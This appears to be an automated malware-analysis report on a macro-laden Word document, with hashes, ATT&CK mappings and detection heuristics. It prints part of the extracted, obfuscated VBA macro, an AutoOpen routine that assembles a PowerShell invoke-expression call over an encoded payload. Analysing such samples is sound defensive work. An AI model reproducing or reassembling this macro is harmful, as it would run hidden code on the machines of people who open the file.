Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf50cbccf96a53c5…

MALICIOUS

Office (OLE)

Size: 229.2 KB
Created: 2018-06-27 13:42:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: fbc92d01f8b80a96cbd3ee1a64c0d1e7
SHA-1: e4d627e084c5f853d559d9cde48b0533d804973d
SHA-256: bf50cbccf96a53c54a87f0d24146b5a715d2c7bcc4e2e047ce8842d63692e382
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. Heuristics indicate the presence of an AutoOpen macro that uses the Shell() function, a common technique for executing arbitrary code. The ClamAV detection name 'Doc.Malware.Shell-6883057-0' further supports this. The VBA script itself is heavily obfuscated but appears to be constructing strings that could be used for downloading or executing further stages.

Heuristics (7)

  • ClamAV: Doc.Malware.Shell-6883057-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Shell-6883057-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   8554 bytes
SHA-256: 6d754bc8754bfec4360d15eefc7dd35c946bd73cae4efbdb4f78e4852ec7e28f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dzriVUls"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IMjTIYlYinKS"
Function kPiDS()
On Error Resume Next
uSCbkc = Sin(74533)
SFsjC = zKRwQf
lUwjZ = 53858
zYkGHW = 21406
raick = CDate(57027)
nRtTzk = 10315
SEDbqnrX = "Hell ." + Chr(40) + " $pSHom" + "e[21]" + Chr(43) + "$" + "Psh" + "OMe[3" + "0]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + Chr(40)
lCzRn = 85209
MrNun = kuzdHS
GKNppF = CDate(54999)
tfdua = 74553
ivmIo = Sin(75000)
wvovD = 25158
nUcntjlp = "'21l70R1" + "21-12" + "7-12-9" + "5&84>70&" + "28k9" + "4b83" + "l91l84&8" + "2k69H17" + "l1" + "27k" + "84k" + "69k"
aBUSNQ = 81306
FNHiwE = 53733
BOajP = OTTALC
HZFsh = Sin(71147)
NGVZvu = CDate(42378)
NVSfir = 71169
QtlBVCB = "31" + ">102&" + "84&" + "83k114k" + "93-88R84" + "}95H6" + "9H10b2" + "1b"
uawNjC = 75649
RpjjZ = 24654
YFnvAT = TbntLb
zrvXU = Sin(80787)
nupsuI = CDate(4948)
JQcbE = 48072
lZtYjIp = "100H7" + "1b6" + "7-12" + "k2" + "2H89@69@" + "69" + "}65&11-" + "30-30}70" + ">70}70" + "k3" + "1k93l"
IAKMoQ = 64823
iKQGTj = 61166
EzOaHP = MaGpV
NYrQF = Sin(83104)
GPZXnc = CDate(34314)
rWrlZW = 44004
UQjMQmqJ = "80&8" + "2}80&95" + "}82-8" + "9k80k31&" + "65R84" + "R30}" + "71>120b" + "82k104-" + "100k112}"
ShNRiT = 50860
zjKQW = 96585
uKwVm = TnjbmN
FPBGm = Sin(18695)
FHVnIw = CDate(72265)
wFizwk = 42162
mCDoJpoS = "10" + "1k83" + "}30" + "&113l89@" + "69@" + "69>6" + "5k11l" + "30" + "b30R70>" + "70H70@3"
MqEGUb = 66978
iIcZP = 21103
iiENv = nFQzuh
UMPdz = Sin(44350)
SXivBi = CDate(37442)
ZjaYB = 355
uCBvi = "1}" + "83k84R" + "69&80l3" + "1&66&94" + "k94>87" + "k88b69" + "}8" + "8&67H" + "84@66l31" + ">88-" + "67l30&"
WJBDU = 73607
IsczW = 7660
dhTbL = ZGiwkD
mSXLq = Sin(71916)
jhKVL = CDate(21513)
sBVwK = 41871
wOnuuzKY = "72" + "l8H" + "86-123>8" + "3H1l101" + "b82b104&" + "117b3" + "0-113@"
RDzRaz = 45393
JTLbw = 20364
nFtwf = lFUFH
qoihv = Sin(8155)
RiSRrF = CDate(18623)
mnHnt = 34687
sIPtzW = "89H69R" + "69>65l" + "11>3" + "0k3" + "0}70@70" + "l70R31b" + "93-80&95" + "k86" + "H8" + "8&69k" + "69}94R6"
cqQEnG = 57692
CMzLq = 39498
KXIqOB = iuoSKw
uXGMs = Sin(39925)
mNcPB = CDate(77831)
mKDhVJ = 78482
SAIoEQWj = "8&67l3" + "1H82}" + "94@92>" + "30&" + "100k83@6" + "4l" + "102-107" + "-86}1" + "15" + "&126-30" + "l11"
kPiDS = SEDbqnrX + nUcntjlp + QtlBVCB + lZtYjIp + UQjMQmqJ + mCDoJpoS + uCBvi + wOnuuzKY + sIPtzW + SAIoEQWj
DnzCB = 8018
XpEFHA = 96315
BFlUH = VwrDKI
YzIpQE = Sin(87435)
Urlfo = CDate(81173)
zQLzD = 11198
End Function
Function VEbzIA()
On Error Resume Next
ZFtVX = 74865
qFRZoh = 37305
CzvbiL = jNGqX
ANfaLv = Sin(95079)
toVhQ = CDate(77545)
ruVsO = 12520
ozQDkc = "3>89R" + "69&69k65" + "l11R30-" + "30l7" + "0@70" + "b7" + "0@3" + "1b8" + "4R" + "93&8" + "2k93H80" + "@66H88R8"
ipRRif = 67808
tYiCb = 74763
GQnmz = WnBsWj
WPozQM = Sin(48346)
XJAcX = CDate(1624)
bPLcuk = 54994
JBYsikHvG = "2>94>" + "82@" + "92>9" + "3l31>82b" + "94R92k3" + "0R" + "104H64&" + "105&9" + "1k92}8"
ptHiC = 48582
nTtHF = 5036
okuGz = sFjVu
ipuwj = Sin(21896)
aEFKO = CDate(24060)
QmDWPn = 4906
ddNQdkszP = "4>69}" + "5R1k116" + ">30" + "-113&89-" + "69b69l65" + "R11>30}" + "30R" + "70@70b70" + "&31l83H8" + "0&86" + "b88k8" + "4R95l95"
SZihl = 69322
zRFYq = 77596
mXsrAT = VqmBv
tPaTS = Sin(85836)
RCFjsz = CDate(9233)
JQpZKa = 99074
hvZBzX = "&80k" + "95>" + "80&67" + "@84@" + "70}31" + "R65R9" + "3&30R92&" + "84k85@88" + "-80-30R" + "93}99"
SJTZI = 4433
bMhcuN = 96905
iXJLP = CDate(73620)
EQjTJK = Sin(5798)
UbhAHm = 97984
FXLkVn = mTKiw
rXJwMzO = "-92@8" + "9b117@0" + "}30>22" + "H31" + ">9" + "8R65k9" + "3-8"
NCclF = 53519
wdSRJY = 89686
MYHiz = CDate(18372)
iAtUNk = Sin(72218)
EmYhC = 39756
fuDwlv = kNBGqO
ARfLV = "8R" + "69}25" + "l22" + "H113" + "&22l24" + "-10l21>1"
FYYfO = 49202
ANWAJN = 2745
... (truncated)